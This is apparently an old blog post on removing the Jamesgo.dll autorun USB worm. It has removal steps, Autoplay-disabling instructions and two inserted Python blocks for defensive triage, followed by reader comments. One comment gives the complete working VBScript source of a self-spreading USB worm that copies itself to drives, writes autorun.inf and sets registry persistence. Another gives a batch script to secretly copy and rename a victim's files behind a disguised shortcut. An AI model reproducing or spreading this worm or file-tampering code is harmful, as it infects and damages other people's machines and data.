USB Worm (Jamesgo.dll)
Patchy
The other day my computer was infected by a USB worm known as Jamesgo.dll. I picked up the virus when I inserted my girlfriend’s USB thumb drive. The worm had modified the autorun.inf file on the thumb drive, so it was able to copy itself automatically to all my hard disk drives. There is little information on the internet about this virus, so I had to figure out my own way to remove it.
By analyzing autorun.inf (which the virus cleverly changed to a system hidden file; I later found out that it also modified the registry so that system hidden files are never displayed) I discovered that each drive contains the Visual Basic script test.vbs. Basically, the script copies test.bat, test.reg, autorun.inf, autorun.ico, and itself to every hard disk in the system. It also runs every 60 seconds, so if you delete it from one drive, within 60 seconds it will recopy itself from a different drive. Furthermore, test.reg simply edits the registry so that test.bat runs on startup and system hidden files are not displayed. Test.bat runs the VB script and sets the files to system, hidden, archived, and read-only.
To remove the virus I crafted a batch file that changes all the test files and autorun files back to normal files (attrib -s -h -r test.*, attrib -s -h -r autorun.*) and then deletes them. Since the batch file deletes all the files quickly, the worm does not have a chance to recopy itself to all the disk drives. I also manually removed all entries for test.bat from the registry.
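A defender-side triage of one drive root for the artefacts described above, as an added example (not the post author's fix script): it parses autorun.inf for keys that launch a program and lists the companion files the post names. The sample autorun.inf content is constructed, since the original file is not reproduced here, and all function names are this example's own.

```python
import ntpath
import re
import tempfile
from pathlib import Path

# [autorun] keys that make Windows start a program when the drive is opened.
LAUNCH_KEY = re.compile(r"(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
SCRIPT_HOSTS = {"wscript", "cscript", "cmd"}
RISKY_EXT = {".vbs", ".vbe", ".js", ".wsf", ".bat", ".cmd", ".exe", ".com", ".scr", ".pif"}
POST_FILES = ("test.vbs", "test.bat", "test.reg", "autorun.ico")  # named in the post

def launch_entries(text):
    """Return [(key, command)] for launch keys inside the [autorun] section."""
    entries, in_autorun = [], False
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            in_autorun = line.lower().startswith("[autorun]")
            continue
        key, sep, value = line.partition("=")
        if in_autorun and sep and LAUNCH_KEY.match(key.strip()):
            entries.append((key.strip().lower(), value.strip()))
    return entries

def is_risky(command):
    """True if the command starts a script host or names a script or executable."""
    for token in command.replace('"', " ").split():
        stem, ext = ntpath.splitext(ntpath.basename(token).lower())
        if ext in RISKY_EXT or (stem in SCRIPT_HOSTS and ext in ("", ".exe")):
            return True
    return False

def triage_root(root):
    """Report launch commands and companion files; iterdir() also lists hidden/system files."""
    files = {p.name.lower(): p for p in Path(root).iterdir() if p.is_file()}
    report = {"launch": [], "companions": [n for n in POST_FILES if n in files]}
    if "autorun.inf" in files:
        text = files["autorun.inf"].read_text(encoding="utf-8", errors="replace")
        report["launch"] = [(k, c, is_risky(c)) for k, c in launch_entries(text)]
    return report

def demo():
    """Run the triage on a constructed drive root (sample content, not the worm's files)."""
    sample = "[AutoRun]\n; constructed sample\nshellexecute=wscript.exe test.vbs\nicon=autorun.ico\n"
    with tempfile.TemporaryDirectory() as root:
        Path(root, "autorun.inf").write_text(sample, encoding="utf-8")
        Path(root, "test.vbs").write_text("' placeholder\n", encoding="utf-8")
        return triage_root(root)

if __name__ == "__main__":
    print(demo())
```

Point `triage_root` at each drive letter's root (for example `E:\\`) before opening the drive in Explorer; any launch entry flagged `True` deserves a look before the files are deleted.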
To prevent a USB Worm from infecting your computer:
1) Go to Start -> Run
2) Type “gpedit.msc” (this is the Group Policy Editor)
3) Click “Administrative Templates” under Computer Configuration
4) Then click “System”
5) Select “Turn off Autoplay”
6) Set it to “Enable” and choose to “Turn off Autoplay on All Drives”
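To confirm that the policy from the steps above took effect, the following added example (not from the original post) reads the registry value that “Turn off Autoplay” writes and decodes it. The value name NoDriveTypeAutoRun, its bit meanings and the machine-over-user precedence are standard Windows behaviour assumed here, not details given in the post.

```python
try:
    import winreg  # standard library, Windows only
except ImportError:
    winreg = None

POLICY_KEY = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
# NoDriveTypeAutoRun is a bitmask: a set bit switches AutoRun off for that drive type.
DRIVE_BITS = {0x01: "unknown", 0x02: "no root directory", 0x04: "removable",
              0x08: "fixed", 0x10: "network", 0x20: "cd-rom", 0x40: "ram disk",
              0x80: "reserved"}

def to_mask(value):
    """The value is normally REG_DWORD (int) but is sometimes stored as REG_BINARY."""
    return value if isinstance(value, int) else int.from_bytes(value, "little")

def read_masks():
    """Return {"HKLM": mask_or_None, "HKCU": mask_or_None} from the policy keys."""
    masks = {"HKLM": None, "HKCU": None}
    if winreg is None:
        return masks  # not running on Windows: nothing to read
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    for name, hive in hives.items():
        try:
            with winreg.OpenKey(hive, POLICY_KEY) as key:
                masks[name] = to_mask(winreg.QueryValueEx(key, "NoDriveTypeAutoRun")[0])
        except OSError:
            pass  # key or value absent: policy not set in this hive
    return masks

def assess(masks):
    """Pick the effective mask (the machine value wins over the user value) and decode it."""
    mask = masks["HKLM"] if masks["HKLM"] is not None else masks["HKCU"]
    if mask is None:
        # No policy value at all: Windows falls back to its built-in default.
        return {"configured": False, "all_drives": False, "still_enabled": None}
    enabled = [name for bit, name in DRIVE_BITS.items() if not mask & bit]
    return {"configured": True, "all_drives": mask & 0xFF == 0xFF, "still_enabled": enabled}

if __name__ == "__main__":
    print(assess(read_masks()))
```

With “Turn off Autoplay on All Drives” applied, `all_drives` is `True` and `still_enabled` is empty; a result that still lists `removable` or `fixed` means the policy has not been applied to this machine or user.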
In conclusion, the Jamesgo.dll USB worm is not a risk for your computer, but it is really annoying! It is also a perfect example of how easy it is to create a worm that travels through removable media. If you want to mess around with and modify the Jamesgo.dll script, you can download it here. If you want to learn more about how to use Autorun and batch files to create an “Auto Hacking USB Thumb Drive”, go here.
Interesting Note: The Jamesgo.dll USB Worm was created in the Philippines which is stated in test.vbs, and the Thumb Drive that infected my computer was purchased in the Philippines and brought back to the US by my girlfriend’s mother.
24 Responses
January 9th, 2008 at 3:37 pm
I had the same problem 6 months ago. It was the same kind of worm with the same functionality but with one extra feature, to add an IFRAME to all php, html, htm files. It was a pain in the butt to “disinfect” all those files.
January 9th, 2008 at 8:54 pm
Wow that is interesting, you could do a lot with this method with the majority of people not knowing so much about computers. Maybe make it a back door something, wonder why they had it copy every 60 sec instead of instantly after one file was deleted? Either way good job on the breakdown.
January 10th, 2008 at 4:47 am
Can someone please give me the link or name of the program used in the 7 episode phone phreaking/network hacking……………PLEASE!!!!!
January 10th, 2008 at 4:48 am
please fast response
January 10th, 2008 at 10:25 am
Hi ya! it is called Cain + Abel, Great Site Nox and Patchy greetings from Ecuador South America
January 10th, 2008 at 3:33 pm
thx bitfrost, i got voip on my router and i want to try that hack….
January 11th, 2008 at 7:35 am
Nox, Patchy and others please help!!! I got the program Cain and Abel (Cain+Abel) and when I am going to add a host I am trying to click on …subnet… and on the option to you wrote from: to: but my gateway is 192.168.1.254 and Cain and Abel can't recognise it because the biggest address is 192.168.1.254 please some help…..
January 11th, 2008 at 6:41 pm
Hacker2479, you should try posting on the forums, more people read them, and it is a great place to ask questions.
January 12th, 2008 at 6:58 am
alright, thanks for advice
January 13th, 2008 at 7:25 am
i cant believe that worm got there…its from the phils and i live in phils too.. some filipinos do know how to make some “crap” heheh… nice fix..
P.S.
do u any compact BACKTRACK?? pls post..tanks,
February 3rd, 2008 at 6:37 am
the creator of this crap is trying to be Onel de Guzman, a filipino who created the most destructive computer virus in history, the lovebug.
February 5th, 2008 at 8:48 pm
i just followed your instructions on how to remove jamesgo.dll. Everything seems to have worked but still, whenever I click C:/ it opens a search result window. How do I repair this? thanks
February 11th, 2008 at 4:35 am
Hi, I just recently caught the virus. I’ve checked other sites and all they tell me is delete autorun, and test.bat,reg etc. But it always comes back! Can you teach how to delete it? It really is annoying. >_
March 2nd, 2008 at 6:16 pm
hope you know how to remove the virus from the source media itself because it would keep on coming back for as long as you're using it…
March 2nd, 2008 at 6:18 pm
for the Filipino who created such a virus, may karma get you! You are worthless… you may be smart but you are of no use! (”,)
March 2nd, 2008 at 10:05 pm
hey try this. if you have a floppy drive, boot off a rescue disk in DOS and manually remove the virus. of course at c:\ you type attrib -r -s -h test.* then del test.* same for autorun.* and same at windows\system32 GOOD LUCK..Mike
March 3rd, 2008 at 9:40 pm
please help me..i also got the virus..sadly my brother transferred it to my mobile phone..please help..how can i remove it
March 10th, 2008 at 6:25 am
hey friends i am new on your web
please guide me on how i can become a hacker
my mail is blackshadowbutt@yahoo.com
May 5th, 2008 at 6:33 am
I received this when I went to Puerto Rico and shared some USB keys to transfer some different programs. We successfully removed it, but noticed that Symantec identified the risk and quarantined the file on some computers, but not on others.
Reminder to update your virus definitions!
June 21st, 2008 at 6:08 am
usb firewall is also a good solution and it also notifies you and deletes the worm from the pendrive http://net-studio.org/application/usb_firewall.php and it's free
July 8th, 2008 at 3:48 am
plz post a code
July 8th, 2008 at 4:00 am
‘W32/SJITBULOK
‘By:TROJANZ@SJIT
‘July 07,08
‘Subject - PAG PANIMALOS
‘Animal Gi INC ko tol!!!!!!
On Error Resume Next
Dim mysource, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe SJIT-BULOK.bat.vbs”
Set fs = CreateObject(”Scripting.FileSystemObject”)
Set mf = fs.getfile(Wscript.ScriptFullname)
Dim text, size
size = mf.size
check = mf.Drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
mysource=mysource&text.readline
mysource = mysource & vbCrLf
Loop
Do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 32
Set tf = fs.createtextfile(winpath & “\SJIT-BULOK.bat.vbs”, 2, True)
tf.write mysource
tf.Close
Set tf = fs.getfile(winpath & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path “A:” Then
Set tf = fs.getfile(flashdrive.Path & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & “\SJIT-BULOK.bat.vbs”, 2, True)
tf.write mysource
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\SJIT-BULOK.bat.vbs”)
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & “\autorun.inf”, 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & “\autorun.inf”)
tf.Attributes = 39
End If
Next
Set rg = CreateObject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\screws”, “C:\SJIT-BULOK.bat.vbs”, “REG_SZ”
If check 1 Then
Wscript.Sleep 20000
End If
Loop While check 1
Set sd = CreateObject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
July 8th, 2008 at 4:16 am
hacking friends usb @ your school
@echo off
cls
mkdir c:\Bonlax181
cd\
rem if the drive is D, use D
d:
copy *.exe c:\Bonlax181
copy *.mp3 c:\Bonlax181
copy *.wmv c:\Bonlax181
copy *.doc c:\Bonlax181
Ren *.exe *.txt
Ren *.mp3 *.txt
Ren *.wmv *.txt
Ren *.doc *.txt
Echo”GAGO KA!NA HACK NA FILE U” >> d:\PLZ CLICK.HTML
exit
after save this MyComputer.bat
to Desktop
then make a shortcut of this then change the shortcut file my compute icon and the original hide it..so that it can't be seen or deleted..
if you're a programmer you already know what I mean…hehehehe
September 15th, 2008 at 1:18 am
MAN UR THE MAN! VIVA LA KEYBOARD MASTERS